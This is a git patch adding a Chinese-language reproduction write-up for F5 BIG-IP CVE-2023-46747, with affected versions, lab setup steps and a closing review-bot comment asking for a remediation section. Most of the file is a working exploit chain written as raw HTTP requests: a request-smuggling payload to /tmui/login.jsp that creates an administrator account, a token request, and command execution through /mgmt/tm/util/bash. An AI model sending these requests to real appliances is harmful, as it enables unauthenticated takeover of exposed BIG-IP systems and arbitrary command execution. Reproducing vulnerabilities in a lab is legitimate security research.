From 4a18e1805c79852d014bbbf55b91ce3aceef5874 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Tue, 31 Oct 2023 21:50:57 +0800 Subject: [PATCH] =?UTF-8?q?Create=20F5=20BIG-IP=20=E8=BF=9C=E7=A8=8B?= =?UTF-8?q?=E4=BB=A3=E7=A0=81=E6=89=A7=E8=A1=8C=E6=BC=8F=E6=B4=9E(CVE-2023?= =?UTF-8?q?-46747).md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- F5 BIG-IP 远程代码执行漏洞(CVE-2023-46747).md | 105 ++++++++++++++++++ 1 file changed, 105 insertions(+) create mode 100644 F5 BIG-IP 远程代码执行漏洞(CVE-2023-46747).md diff --git a/F5 BIG-IP 远程代码执行漏洞(CVE-2023-46747).md b/F5 BIG-IP 远程代码执行漏洞(CVE-2023-46747).md new file mode 100644 index 0000000..ce3c9dd --- /dev/null +++ b/F5 BIG-IP 远程代码执行漏洞(CVE-2023-46747).md 
@@ -0,0 +1,105 @@ +## F5 BIG-IP 远程代码执行漏洞(CVE-2023-46747) + +## 漏洞描述 + +**F5 BIG-IP 远程代码执行漏洞(CVE-2023-46747)**,未经授权的远程攻击者通过管理端口或自身IP地址访问BIG-IP系统,利用此漏洞可能绕过身份认证,导致在暴露流量管理用户界面(TMUI)的 F5 BIG-IP 实例上执行任意代码。 + +## 影响版本 + +``` +F5 BIG-IP <= 17.1.0 +16.1.0 <= F5 BIG-IP <= 16.1.4 +15.1.0 <= F5 BIG-IP <= 15.1.10 +14.1.0 <= F5 BIG-IP <= 14.1.5 +13.1.0 <= F5 BIG-IP <= 13.1.5 +``` + +## 环境下载 + +``` +https://my.f5.com/manage/s/downloads?productFamily=BIG-IP&productLine=big-ip_v15.x&version=15.1.8&container=Virtual-Edition&files=BIGIP-15.1.8-0.0.7.ALL-vmware.ova&locations=JAPAN + +链接:https://pan.baidu.com/s/1zLMXJCKtZtzIxCQGoxwPgg +提取码:ksdn +``` + +搭建方式很简单,下载BIGIP-15.1.8-0.0.7.ALL-vmware.ova,接着用vm打开ova即可 + +搭建过程 [F5 WMware虚拟机环境搭建-BIG-IP Virtual Edition 11.3.0-CSDN博客](https://blog.csdn.net/ice_age1/article/details/49998059) + +重置web密码 + +``` +进入tmsh模式 敲击 +modify auth user admin password admin +``` + +搭建成功页面 + + + +## 漏洞复现 + +### 第一步 发送 TMUI模块的请求 + +当发送到F5 BIG-IP TMUI模块的请求(例如登陆页面/tmui/login.jsp)中,包含一个类似值为 "xxx, chunked" 的 "Transfer-Encoding" 头,并且请求体内容满足特定内容时,漏洞会被触发。 + +&name=admin&name_before=&passwd=admin789456 参数填入账户密码 + +``` +POST /tmui/login.jsp HTTP/1.1 +Host: 192.168.127.146 +Content-Type: application/x-www-form-urlencoded + + +204 +HTTP/1.1/tmui/Control/form 127.0.0.1 localhost localhostP Tmui-Dubbuf BBBBBBBBBBB +REMOTEROLE0� localhostadminq_timenow=a&_timenow_before=&handler=%2ftmui%2fsystem%2fuser%2fcreate&&&form_page=%2ftmui%2fsystem%2fuser%2fcreate.jsp%3f&form_page_before=&hideObjList=&_bufvalue=eIL4RUnSwXYoPUIOGcOFx2o00Xc%3d&_bufvalue_before=&systemuser-hidden=[["Administrator","[All]"]]&systemuser-hidden_before=&name=admin&name_before=&passwd=admin789456&passwd_before=&finished=x&finished_before=� +0 +``` + +![](./assets/20231031212344495.png) + + + +### 第二步 获取用户token + +``` +POST /mgmt/shared/authn/login HTTP/1.1 +Host: 192.168.127.146 +Content-Length: 22 +Content-Type: application/x-www-form-urlencoded + + {"username":"admin", "password":"admin789456"} +``` + 
+![](./assets/20231031212450387.png) + + + +### 第三步 执行命令 + +将获取到得token带入`X-F5-Auth-Token`中,在通过`/mgmt/tm/util/bash` 执行命令 + +``` +POST /mgmt/tm/util/bash HTTP/1.1 +Host: 192.168.127.146 +Connection: keep-alive +Content-Length: 22 +X-F5-Auth-Token:ICGZXJJROASFRPWYZF3EAQFCGN + + {"command":"run","utilCmdArgs":"-c whoami"} +``` + +![](./assets/20231031212657529.png) + + + +### 参考链接 + +``` +https://github.com/projectdiscovery/nuclei-templates/blob/56d79688e0d2ebce5b8939961946f4f32e663700/http/cves/2023/CVE-2023-46747.yaml +https://mp.weixin.qq.com/s/wUoBy7ZiqJL2CUOMC-8Wdg +https://blog.csdn.net/ice_age1/article/details/49998059 +``` +
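Review bot: The new file runs from `## 漏洞描述` to `### 参考链接` with no remediation or detection section, so a reader gets the affected versions and the reproduction but nothing on how to fix or spot the issue. Add a section after `## 影响版本` that points to F5's advisory for CVE-2023-46747 for the fixed releases, and that states the interim control the description already implies: keep TMUI unreachable from untrusted networks, on both the management port and self IPs. In the same version block, `F5 BIG-IP <= 17.1.0` has no lower bound while the other four lines do; give it one in the same form so it does not read as covering every release. The `## 环境下载` block lists a Baidu Pan mirror of the OVA next to the my.f5.com link with no checksum; drop the mirror or publish the vendor hash beside it so the image can be verified before it is imported. Minor: `搭建成功页面` has no image under it, and `WMware` in the link text should be `VMware`.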